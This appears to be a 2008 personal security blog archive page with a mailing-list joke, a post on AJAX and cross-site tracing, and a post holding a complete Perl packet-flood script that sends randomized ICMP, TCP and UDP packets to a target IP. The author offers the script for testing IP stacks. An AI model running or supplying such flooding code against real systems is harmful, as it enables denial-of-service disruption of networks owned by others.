20 November 2008

full disclosure just blew past my lunacy limit

from this thread on the list:


From: n3td3v
Date: Thu, 20 Nov 2008 20:27:01 +0000

n3td3v is real

On Thu, Nov 20, 2008 at 8:23 PM, wrote:
> The mustache respectfully disagrees with you, for
> the very first time.
>
> - -al
>
>
> On Thu, 20 Nov 2008 15:17:24 -0500 n3td3v
> wrote:
>>
>> im not a sock puppet im real.
>>
>> On Thu, Nov 20, 2008 at 8:16 PM,
>> wrote:
>>> *Two* sock puppets, and a dumb *old* guy
>>> with a unkempt mustache.

19 November 2008

AJAX Fun

A little snippet of code I'm playing with. This started as me learning more about XST, to understand why TRACE being enabled was considered a BadThing(tm). [see: this white paper (.pdf format) for more on that].

In my opinion, the best way to learn is to do, so I quickly whipped up the following so I could play, and handily, this finally gives me a good reason to write my first bit of AJAX even =)

A couple of points:

  • If you change the method from GET to HEAD, this makes a handy banner grabber

  • If you change the method to TRACE, it may or may not work, depending on the browser you are using.



To explain the latter item:

The current versions of both Firefox and IE refuse to run TRACE via XMLHttpRequest.
This is the correct behaviour, per the spec, and is certainly more secure (it goes a fair way to mitigate XST in general in fact). I have not tried older versions or other browsers to see how they handle it.


Note that I snarfed bits and pieces of this code from various places on the net, and didn't create all of this from scratch. However, I have tweaked and changed things enough to feel OK calling this "my code".

I'll probably tweak this further. I'm considering just making different buttons for the different types of requests and letting the function figure out what method to use based on that, for example.

Anyway, here's the code as it stands after about 20 minutes of crash course in AJAX:

[EDIT:
if anyone knows how to post HTML/Javascript to blogspot, I'd be grateful for the tip, it keeps trying to render regardless of my use of pre or code. I even tried to settle for textarea, but it borked the formatting of the code unfortunately and added br tags all over the place. *sigh*. ]

Here's a pastebin of the code instead

[EDIT 2010-03-02:
Oh for ... Apparently IE8 renders the pastebin code as HTML instead of displaying it as text/plain. *cry*.

04 November 2008

Packet Flooder Script

I considered for a while whether or not to post this here.
Ultimately I decided to go ahead and do it for a couple of reasons:

1. This isn't anything special, there are myriad similar (or better) tools out there that do the same thing.
2. It is actually useful for testing IP stacks on various devices.

And so, here it is, a perl based packet flood script.
It's got a few things that make it interesting:

1. Ports are chosen randomly for TCP and UDP.
2. ICMP type codes are chosen randomly.
3. TCP flags are chosen randomly.
4. The fragment bit is un/set randomly.



#!/usr/bin/perl -w
# =================================================
# simple network flooder script
# takes type of flood (icmp, tcp, udp) as param
# optionally takes dest ip and packet count
# =================================================
my $VERSION = 0.5;
# =================================================
use strict;
use Net::RawIP;

my $flood = shift or &usage();
my $dstip = shift || '127.0.0.1';
my $pktct = shift || 100;

&icmpflood($dstip, $pktct) if $flood =~ 'icmp';
&tcpflood($dstip, $pktct) if $flood =~ 'tcp';
&udpflood($dstip, $pktct) if $flood =~ 'udp';

sub icmpflood() {
my($dstip, $pktct, $code, $type, $frag);
$dstip = shift;
$pktct = shift;

print "\nstarting flood to $dstip\n";
for(my $i=0; $i <= $pktct; $i++) {

$code = int(rand(255));
$type = int(rand(255));
$frag = int(rand(2));

my $packet = new Net::RawIP({
ip => {
daddr => $dstip,
frag_off => $frag,
},
icmp => {
code => $code,
type => $type,
}
});

$packet->send;
print "sent icmp $type->$code, frag: $frag\n";
}
print "\nflood complete\n\n";
}

sub tcpflood() {
my($dstip, $pktct, $sport, $dport, $frag, $urg, $psh, $rst, $fin,
$syn, $ack);
$dstip = shift;
$pktct = shift;
print "\nstarting flood to $dstip\n";
for(my $i=0; $i <= $pktct; $i++) {

$sport = int(rand(65535));
$dport = int(rand(65535));
$frag = int(rand(2));
$urg = int(rand(2));
$psh = int(rand(2));
$rst = int(rand(2));
$fin = int(rand(2));
$syn = int(rand(2));
$ack = int(rand(2));

my $packet = new Net::RawIP({
ip => {
daddr => $dstip,
frag_off => $frag,
},
tcp => {
source => $sport,
dest => $dport,
urg => $urg,
psh => $psh,
rst => $rst,
fin => $fin,
syn => $syn,
ack => $ack,
}
});

$packet->send;
print "sent tcp packet from $sport to $dport, frag: $frag, psh:
$psh, rst: $rst, fin: $fin, syn: $syn, ack: $ack\n";
}
print "\nflood complete\n\n";
}

sub udpflood() {
my($dstip, $pktct, $sport, $dport, $frag);
$dstip = shift;
$pktct = shift;

print "\nstarting flood to $dstip\n";
for(my $i=0; $i <= $pktct; $i++) {

$sport = int(rand(255));
$dport = int(rand(255));
$frag = int(rand(2));

my $packet = new Net::RawIP({
ip => {
daddr => $dstip,
frag_off => $frag,
},
udp => {
source => $sport,
dest => $dport,
}
});

$packet->send;
print "sent udp packet from $sport to $dport, frag: $frag\n";
}
print "\nflood complete\n\n";
}

sub usage() {
print "
need to set a valid flood type (one of icmp, tcp, udp)
optionally set dest ip and packetcount

example:

$0 [tcp udp icmp] \n\n";
exit 0;
}